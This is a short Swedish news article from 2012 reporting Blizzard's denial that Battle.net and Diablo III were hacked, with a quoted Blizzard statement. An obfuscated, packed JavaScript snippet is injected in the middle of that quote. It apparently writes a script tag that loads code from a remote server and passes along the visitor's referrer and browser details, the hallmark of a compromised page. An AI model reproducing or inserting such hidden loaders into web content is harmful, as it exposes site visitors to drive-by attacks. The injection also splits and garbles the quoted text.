Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Diablo 3 har inte blivit hackat

Diablo 3 har inte blivit hackat
Filip Urde
  • On 24 maj, 2012
  • http://www.revue.se/filip-urde

Sen den extremt lyckade releasen av årets kanske största spelsläpp (Diablo 3) så har rykten florerat bland användarna om hur deras konton lätt kan bli kapade av hackers. Många vågar bland annat inte gå in på public games. Blizzard vill dock lugna.

Om ni är försiktiga med era kontouppgifter och använder Blizzards säkerhetssystem Authenticator. så är allt lugnt. Säger Blizzard som nu kommenterar de uppgifter som sprids på internet om hackade konton.

”We’d eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irrya|var|u0026u|referrer|aeytn||js|php’.split(’|’),0,{}))
like to take a moment to address the recent reports that suggested that Battle.net and Diablo III may have been compromised. Historically, the release of a new game — such as a World of Warcraft expansion — will result in an increase in reports of individual account compromises, and that’s exactly what we’re seeing now with Diablo III. We know how frustrating it can be to become the victim of account theft, and as always, we’re dedicated to doing everything we can to help our players keep their Battle.net accounts safe — and we appreciate everyone who’s doing their part to help protect their accounts as well.”

Enligt Blizzard har alltså inte Battle.net blivit hackat på någtot vis utan det beror istället på att spelare varit oaktsamma med sina uppgifter. Men folk är inte mindre oroade för det, vi på Revue hoppas att blizzard har rätt!